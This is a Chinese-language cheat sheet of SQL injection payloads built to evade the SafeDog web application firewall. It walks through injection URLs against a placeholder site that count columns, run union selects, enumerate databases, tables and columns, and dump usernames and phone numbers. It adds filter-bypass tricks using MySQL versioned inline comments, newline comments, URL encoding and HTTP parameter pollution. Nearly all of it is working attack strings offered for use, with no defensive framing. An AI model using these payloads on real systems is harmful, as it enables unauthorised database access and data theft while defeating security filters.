安全狗Bypass

安全狗Bypass

No.1 内联注释(/*![12345]*/)绕过方法：

• /*!select*/: 相当于没有注释
• /*!12345select*/: 当12345小于当前mysql版本号的时候，注释不生效，当大于版本号的时候注释生效。
• /*![]*/: []中括号中的数字若填写则必须是5位

1,执行检测安全狗功能

http://test.com/test?id=1' or 1 and 1=1--+

拦截绕过方法：

http://test.com/test?id=1' or -1 and -1=-1--+

2，判断列数

http://test.com/test?id=1' or -1/*!11544order/*!11544by/*!11544*/1--+

3，联合查询绕过

http://test.com/test?id=1' or -1/*!11544union/*!11544select/*!115441,2,3,4,5,6*/--+

4，爆库

http://test.com/test?id=1' /*!11544union/*!11544select/*!115441,2,3,4,group_concat(schema_name),6*/from information_schema.schemata--+

5，表名

http://test.com/test?id=1' /*!11544union /*!11544select/*!115441,2,3,4,/*!11544group_concat(/*!11544table_name),6/*!11544from/*!11544information_schema.tables/*!11544where/*!11544table_schema=/*!11544database/*!11544()*/--+

6，列名

http://test.com/test?id=1' /*!11544union/*!11544select 1,2,3,4, 
group_concat(column_name),6 from information_schema.columns where 
table_schema in (database/*!11544()) and table_name in (0x7573657273)*/--+

7，获取内容

http://test.com/test?id=1' /*!11544union /*!11544select 1,2,3,4, group_concat(concat_ws(0x23,username,tel)),6 from users*/--+

内联注释

http://test.com/test?id=1' union/*!88888www.hacker.wang*/select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_schema=database () and /*!88888www.hacker.wang*/table_name=0x7573657273 --+

 

mysql语法绕过

http://test.com/test?id=1' union -- www.hacker.wang%0aselect 1, 2,3,4, group_concat(column_name),6 from information_schema.columns where table_schema=database () and  -- www.hacker.wang%0a table_name=0x7573657273--+

 

url编码绕过

http://test.com/test?id=1' union/*%!a*/select 1,2,3,4, group_concat(column_name),6 from information_schema.columns where table_schema=database () and table_name in (0x7573657273) --+

 

HTTP参数污染绕过

http://test.com/test?id=1'/*&id=1'union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_schema=database() and table_name='users' --+*/